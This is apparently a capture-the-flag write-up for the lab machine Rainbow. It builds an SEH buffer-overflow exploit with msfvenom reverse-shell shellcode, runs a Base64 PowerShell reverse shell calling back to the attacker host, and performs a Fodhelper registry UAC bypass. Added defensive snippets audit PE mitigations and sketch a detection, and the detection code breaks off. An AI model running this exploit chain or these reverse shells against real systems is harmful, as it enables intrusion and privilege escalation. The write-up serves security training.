oxdf@hacky$ curl http://10.0.0.202:8080 -d 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x'

It hangs, and back in x32dbg in the SEH tab:

image-20250731172524145

I can find those using pattern_offset:

gdb-peda$ pattern_offset 0x41484241
1095254593 found at offset: 664
gdb-peda$ pattern_offset 0x32424163
843202915 found at offset: 660

Python Script

At this point I’ll switch to a Python script to capture my progress as I build it. I’ll start with a script that can make a simple POST request to the server:

# /// script
# requires-python = ">=3.12"
# dependencies = [
#     "pwntools",
# ]
# ///
import sys
from pwn import remote


if len(sys.argv) != 3:
    print(f"usage: {sys.argv[0]} <ip> <port>")
    sys.exit(1)

data = b""

http_request = f"""POST / HTTP/1.1
Host: {sys.argv[1]}:{sys.argv[2]}
User-Agent: curl/8.5.0
Accept: */*
Content-Length: {len(data)}
Connection: keep-alive

""".replace('\n', '\r\n').encode()
http_request += data

p = remote(sys.argv[1], sys.argv[2])
p.send(http_request)
print(p.recvall(timeout=0.5).decode())
p.close()

The dependencies at the top are added with uv add --script exploit.py pwntools, which now allows uv to run this in a virtual environment and handle getting pwntools installed.

This returns the simple index.html I wrote:

oxdf@hacky$ uv run --script exploit.py 10.0.0.202 8080
[+] Opening connection to 10.0.0.202 on port 8080: Done
[+] Receiving all data: Done (146B)
[*] Closed connection to 10.0.0.202 port 8080
HTTP/1.1 200 OK
Cache-Control: no-cache, private
Content-Type: text/html
X-Powered-By: Rainbow 0.1
Content-Length: 20

<h1>Hello, 0xdf</h1>\x00

I’ll update it to overflow the POST data by changing one line:

data = b"A" * 1000

Now running it crashes:

oxdf@hacky$ uv run --script exploit.py 10.0.0.202 8080
[+] Opening connection to 10.0.0.202 on port 8080: Done
[+] Receiving all data: Done (0B)
[*] Closed connection to 10.0.0.202 port 8080

I can test the offsets by restarting x32dbg and updating data:

buffer_length = 1000
data = b"A" * 660
data += b"BBBB"
data += b"CCCC"
data += b"D" * (buffer_length - len(data))

It’s best practice to keep the buffer the same length during an overflow, so I’ll use “D” to fill out the buffer to 1000. Running this, I’ll see that the next exception handler is Bs and the handler is Cs:

image-20250801060928900

POP POP RET

m0chan has a really nice article, Win32 Buffer Overflow - SEH Overflows & Egghunters, that covers this kind of exploit and the strategy for exploiting it. Putting a POP POP RET gadget into the handler address will transfer control to a SEH record that I control.

A lot of the write-ups out there use mona, but it doesn’t work with x64dbg. I’ll use ERC. After installing, I’ll run ERC --SEH to show all the POP POP RET gadgets in the Log tab:

image-20250801061851905

There’s a ton. I’ll grab one from the top that’s in the actual binary and not a library (though it should work either way).

I’ll replace the Cs with this address:

buffer_length = 1000
data = b"A" * 660
data += b"BBBB"
data += p32(0x4094d8)
data += b"D" * (buffer_length - len(data))

I’ll need to add p32 to the from pwn import line as well (unless I just imported *). I’ll add a breakpoint at the address where the crash happens (0x00406156), and run. It hits the breakpoint, and the next handler is the gadget address:

image-20250801062534627

If I add a break at the gadget and continue, I’ll hit it:

image-20250801062718676
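
A gadget at a fixed address inside the module is only usable as an overwritten handler when that module carries no SafeSEH table, and only stable across restarts when the module is not relocated by ASLR. As an added example (not part of the original write-up), this Python reads those settings from a PE32 header so a defender can audit a binary before shipping it; build_sample and the header it produces are constructed test input, not rainbow.exe.

```python
import struct

# DllCharacteristics bits from winnt.h
DYNAMIC_BASE = 0x0040  # image may be relocated (ASLR)
NX_COMPAT = 0x0100     # image opts in to DEP
NO_SEH = 0x0400        # image declares that it has no SEH handlers


def rva_to_offset(sections, rva):
    """Map a relative virtual address to a file offset using the section table."""
    for vaddr, vsize, raw_ptr, raw_size in sections:
        if vaddr <= rva < vaddr + max(vsize, raw_size):
            return raw_ptr + (rva - vaddr)
    return None


def audit_pe32(data):
    """Return the header fields that decide whether an SEH overwrite is practical."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsects = struct.unpack_from("<H", data, pe + 6)[0]     # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]  # SizeOfOptionalHeader
    opt = pe + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("SafeSEH only applies to 32-bit (PE32) images")
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    num_dirs = struct.unpack_from("<I", data, opt + 92)[0]

    sections = []
    for i in range(nsects):
        hdr = opt + opt_size + 40 * i
        vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", data, hdr + 8)
        sections.append((vaddr, vsize, raw_ptr, raw_size))

    # Data directory 10 is the load configuration. SEHandlerTable and
    # SEHandlerCount sit at offsets 64 and 68 of IMAGE_LOAD_CONFIG_DIRECTORY32.
    safeseh_handlers = None
    if num_dirs > 10:
        lc_rva, _lc_size = struct.unpack_from("<II", data, opt + 96 + 8 * 10)
        off = rva_to_offset(sections, lc_rva) if lc_rva else None
        if off is not None and struct.unpack_from("<I", data, off)[0] >= 72:
            table, count = struct.unpack_from("<II", data, off + 64)
            if table:
                safeseh_handlers = count

    return {
        "image_base": image_base,
        "aslr": bool(dll_chars & DYNAMIC_BASE),
        "dep": bool(dll_chars & NX_COMPAT),
        "no_seh": bool(dll_chars & NO_SEH),
        "safeseh_handlers": safeseh_handlers,
    }


def findings(report):
    """Translate the header fields into the gaps an SEH overwrite relies on."""
    out = []
    if not report["no_seh"] and report["safeseh_handlers"] is None:
        out.append("no SafeSEH table: handler addresses in this module are not validated")
    if not report["aslr"]:
        out.append("DYNAMIC_BASE clear: module addresses are identical on every start")
    if not report["dep"]:
        out.append("NX_COMPAT clear: image does not opt in to DEP")
    return out


def build_sample(dll_chars, seh_handlers):
    """Constructed, non-executable PE32 header with one section (test input only)."""
    buf = bytearray(0x400)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)
    buf[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", buf, 0x84, 0x014C, 1, 0, 0, 0, 224, 0x0102)
    opt = 0x98
    struct.pack_into("<H", buf, opt, 0x10B)
    struct.pack_into("<I", buf, opt + 28, 0x400000)       # ImageBase
    struct.pack_into("<H", buf, opt + 70, dll_chars)
    struct.pack_into("<I", buf, opt + 92, 16)             # NumberOfRvaAndSizes
    sect = opt + 224
    buf[sect:sect + 6] = b".rdata"
    struct.pack_into("<IIII", buf, sect + 8, 0x200, 0x1000, 0x200, 0x200)
    if seh_handlers:
        struct.pack_into("<II", buf, opt + 96 + 80, 0x1000, 72)   # load config directory
        struct.pack_into("<I", buf, 0x200, 72)                     # load config Size
        struct.pack_into("<II", buf, 0x200 + 64, 0x401100, seh_handlers)
    return bytes(buf)


if __name__ == "__main__":
    for label, sample in (("no mitigations", build_sample(0, 0)),
                          ("hardened", build_sample(DYNAMIC_BASE | NX_COMPAT, 3))):
        print(label, findings(audit_pe32(sample)) or "no SEH-overwrite gaps in header")
```

Pointing audit_pe32 at the bytes of a real 32-bit module gives the same report; linking with /SAFESEH, /DYNAMICBASE and /NXCOMPAT is what clears the findings.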

Finding Space

I’ll step through the RET and now it’s going to execute my Bs:

image-20250801063215008

This is good news in that it’s running whatever I put there. But I’ll also notice that after four bytes, it’s stuff I didn’t send.

Looking back, there is a stream of As, though there are some breaks in it with other stuff:

image-20250801063329458

Looking around a bit more, there is a stream of ~630 As before a stretch where there are some overwrites. I’ll jump back to that buffer. In this instance, it jumped to the Bs at 0xb3fbe4. The nice string of potentially uninterrupted As starts at 0xb3f950. I can test putting something different as the first four bytes of the data buffer (and shortening the As to 656), and confirm that that is the start of the buffer.

The offset here is 660, which makes sense:

oxdf@hacky$ python -c 'print(0xb3fbe4 - 0xb3f950)'
660

Calculating Jumps

I’d like to jump back 660. nasmshell (or there’s an MSF version msf-nasm_shell preinstalled on some pentesting distributions) will help see what commands look like:

oxdf@hacky$ nasmshell 
nasm> jmp -660
E967FDFFFF               jmp 0xfffffd6c

That’s a five byte instruction, and the buffer only has four bytes. A jmp short will work, but it can only do up to +/-127 bytes.

nasm> jmp short -100
EB9A                     jmp short 0xffffff9c

If I jump back 8, and then use those 8 bytes for a jump back 652, that’s a total of jumping back 660. I’ll calculate the instructions:

nasm> jmp short -8
EBF6                     jmp short 0xfffffff8
nasm> jmp -652
E96FFDFFFF               jmp 0xfffffd74

The jmp short -8 will be replacing the Bs, and the jmp -652 will be eight bytes before, shortening the junk As:

buffer_length = 1000
data = b""
data += b"A" * (660 - 8)
data += b"\xe9\x6f\xfd\xff\xff" + b"EEE"   # jmp -652
data += b"\xeb\xf6" + b"BB"                # jmp short -8
data += p32(0x4094d8)
data += b"D" * (buffer_length - len(data))

I could have done 5 bytes, but I jumped 8, so I’ll make sure to pad in three bytes of junk (Es in this case). Running this, I’m able to jump back to the start of the buffer.

Local Exploit

I’ll have msfvenom generate shellcode for a reverse shell:

oxdf@hacky$ msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -b '\x00\x0a\x0d' -f python -v sc LHOST=10.0.0.201 LPORT=9001
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1714 bytes
sc =  b""
...[snip]...

I noticed that a null byte seemed to truncate my input, so I’ll have it avoid that. I’m just avoiding newline and carriage return as well out of caution. If my payload doesn’t work, it would be worth doing a more complete bad character check.

I’ll add this to the top of my script, and update the data:

buffer_length = 1000
data = b""
data += b'\x90' * 50
data += sc
data += b"A" * (660 - 8 - len(data))
data += b"\xe9\x6f\xfd\xff\xff" + b"EEE"   # jmp -652
data += b"\xeb\xf6" + b"BB"                # jmp short -8
data += p32(0x4094d8)
data += b"D" * (buffer_length - len(data))

I’ll use some NOPs (\x90) at the front of the buffer to allow for any miscalculation or small differences on the remote hosts. I could also aim to jump into the middle of this NOP sled if I have issues. If a jump lands in the NOPs, it will just step forward until it reaches the shellcode that follows.

After the shellcode, I pad out the remaining space, subtracting out the length of the buffer to this point.

I’ll run rainbow.exe outside of the debugger and execute the script:

oxdf@hacky$ uv run --script exploit.py 10.0.0.202 8080
[+] Opening connection to 10.0.0.202 on port 8080: Done
[+] Receiving all data: Done (0B)
[*] Closed connection to 10.0.0.202 port 8080

At nc in another window, there’s a shell:

oxdf@hacky$ nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.0.0.202 57137
Microsoft Windows [Version 10.0.19045.3693]
(c) Microsoft Corporation. All rights reserved.

FLARE-VM Fri 08/01/2025 11:11:24.33
C:\Users\0xdf\Desktop>

Remote Exploit

I could just re-run msfvenom, but I’d rather make my script dynamic. I’ll update the usage:

if len(sys.argv) != 5:
    print(f"usage: {sys.argv[0]} <RHOST> <RPORT> <LHOST> <LPORT>")
    sys.exit(1)

RHOST, RPORT, LHOST, LPORT = sys.argv[1:5]

I’ll update places that referenced sys.argv to use these variables instead.

I’ll import subprocess and use it to call msfvenom:

# generate shellcode
msfvenom = subprocess.run(
    f"msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -b '\\x00\\x0a\\x0d' -f hex sc LHOST={LHOST} LPORT={LPORT}".split(),
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE,
    text=True,
)
print("Generating shellcode")
print(msfvenom.stderr)
sc = unhex(msfvenom.stdout)

I’ll test it locally and it still returns a shell. Now I’ll run it on Rainbow:

oxdf@hacky$ uv run --script exploit.py 10.129.234.59 8080 10.10.14.79 443
Generating shellcode
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of hex file: 702 bytes


[+] Opening connection to 10.129.234.59 on port 8080: Done
[+] Receiving all data: Done (0B)
[*] Closed connection to 10.129.234.59 port 8080

And there’s a connection at nc:

oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.129.234.59 49605
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\rainbow>

And I can read user.txt:

C:\Users\rainbow\Desktop>type user.txt
81a0c03b************************

I can switch to PowerShell as well:

C:\>powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\>

My full script is available here.

Shell as rainbow [admin]

Enumeration

rainbow is in the Administrators group:

PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes                                        
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only                          
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only                          
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192

Still, the current process is a low integrity level process and doesn’t have the administrator privileges:

PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

That means I’ll need to bypass UAC.

I already noted that rainbow.exe is a 32-bit process. Unsurprisingly, my shell is as well:

PS C:\> [Environment]::Is64BitProcess
False

It is a 64-bit machine:

PS C:\> systeminfo

Host Name:                 RAINBOW
OS Name:                   Microsoft Windows Server 2019 Datacenter
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          EC2
Registered Organization:   Amazon.com
Product ID:                00430-70398-04661-AA533
Original Install Date:     1/16/2022, 10:54:12 AM
System Boot Time:          7/30/2025, 2:26:53 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
                           [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC) Coordinated Universal Time
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,961 MB
Virtual Memory: Max Size:  5,503 MB
Virtual Memory: Available: 4,357 MB
Virtual Memory: In Use:    1,146 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\RAINBOW
Hotfix(s):                 36 Hotfix(s) Installed.
                           ...[snip]...
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.129.0.1
                                 IP address(es)
                                 [01]: 10.129.234.59
                                 [02]: fe80::2bd4:c10d:2bb:abdf
                                 [03]: dead:beef::ccc5:a045:590:57b0
                                 [04]: dead:beef::cc
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

UAC Bypass

Strategy

This post from RedFox Security has nice details about UAC and its bypasses. I’ll use the “Bypass using Fodhelper” technique. While the article shows it from a GUI, it’s just setting two registry keys and then running a process, so it’ll work fine from a reverse shell.

64-bit Process

It’ll be easier to work from a 64-bit process. To get a 64-bit shell, I’ll simply run the sysnative PowerShell with a reverse shell command. I’ll grab the PowerShell #3 (Base64) shell from revshells.com and run it with that powershell:

C:\>\Windows\sysnative\WindowsPowerShell\v1.0\powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANwA5ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

At a new nc, I get a shell and it’s 64-bit:

oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.129.234.59 49710

PS C:\rainbow> [Environment]::Is64BitProcess
True

Fodhelper

To bypass UAC using Fodhelper, I’ll need to:

  • Set the DelegateExecute property of the HKCU\Software\Classes\ms-settings\Shell\Open\command key to empty.
  • Set the (default) property of that same key to a reverse shell.
  • Start the fodhelper.exe binary.

The ms-settings key isn’t present, so I’ll first create the key:

PS C:\> New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force

    Hive: HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open

Name                           Property
----                           --------
command  

Now I’ll set the two properties:

PS C:\> New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force

DelegateExecute : 
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open
PSChildName     : command
PSDrive         : HKCU
PSProvider      : Microsoft.PowerShell.Core\Registry

PS C:\> Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "powershell -exec bypass -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANwA5ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" -Force

I can verify they are set:

PS C:\> Get-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command"

DelegateExecute : 
(default)       : powershell -exec bypass -e ...[snip]...
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open
PSChildName     : command
PSDrive         : HKCU
PSProvider      : Microsoft.PowerShell.Core\Registry

Now to trigger, run fodhelper.exe:

PS C:\> \Windows\system32\fodhelper.exe

And a shell connects back to another listening nc:

oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.129.234.59 50081

PS C:\Windows\system32>

It’s still running as rainbow, but this time with full admin privs:

PS C:\Windows\system32> whoami
rainbow\rainbow
PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State   
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Enabled 
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled 
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled 
SeCreateGlobalPrivilege                   Create global objects                                              Enabled 
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled

I’ll get the root flag:

PS C:\users\administrator\desktop> cat root.txt
063fa02b************************
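
The bypass above leaves two artifacts a defender can correlate: a write under the per-user ms-settings\Shell\Open\command key, then fodhelper.exe spawning a child process. The following is an added detection example, not part of the original write-up; the events are constructed, the dict fields are a simplified stand-in for Sysmon registry (ID 13) and process-creation (ID 1) records, and the SID, command line and 10-minute window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Per-user handler path for the ms-settings protocol. Sysmon reports HKCU\Software\Classes
# as HKU\<SID>_Classes, so both spellings are matched.
HIJACK_KEY = re.compile(
    r"\\(?:Software\\Classes|S-1-5-21-[\d-]+_Classes)\\ms-settings\\shell\\open\\command(?:\\|$)",
    re.IGNORECASE,
)
WINDOW = timedelta(minutes=10)  # assumed correlation window

# Constructed events: simplified dicts modelled on Sysmon IDs 13 (registry value set)
# and 1 (process creation). The SID and command lines are placeholders.
SAMPLE_EVENTS = [
    {"id": 13, "time": "2025-07-30 15:01:02", "user": "RAINBOW\\rainbow",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001_Classes\ms-settings\Shell\Open\command\DelegateExecute",
     "details": "(Empty)"},
    {"id": 13, "time": "2025-07-30 15:01:03", "user": "RAINBOW\\rainbow",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001_Classes\ms-settings\Shell\Open\command\(Default)",
     "details": "powershell -enc <PLACEHOLDER>"},
    {"id": 1, "time": "2025-07-30 15:01:40", "user": "RAINBOW\\rainbow",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\fodhelper.exe", "integrity": "High"},
    # Benign: fodhelper opened from Settings, no child shell, no handler write.
    {"id": 1, "time": "2025-07-30 16:20:00", "user": "RAINBOW\\admin2",
     "image": r"C:\Windows\System32\fodhelper.exe",
     "parent": r"C:\Windows\ImmersiveControlPanel\SystemSettings.exe", "integrity": "High"},
]

def parse(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")

def detect(events):
    """Return alerts: handler writes (medium) and fodhelper children after a write (high)."""
    alerts, last_write = [], {}
    for ev in sorted(events, key=lambda e: parse(e["time"])):
        when = parse(ev["time"])
        if ev["id"] == 13 and HIJACK_KEY.search(ev["target"]):
            last_write[ev["user"]] = when
            alerts.append(("medium", ev["user"], "ms-settings handler written: " + ev["target"].rsplit("\\", 1)[-1]))
        elif ev["id"] == 1 and ev["parent"].lower().endswith("\\fodhelper.exe"):
            # fodhelper.exe auto-elevates, so any child it spawns runs at high integrity.
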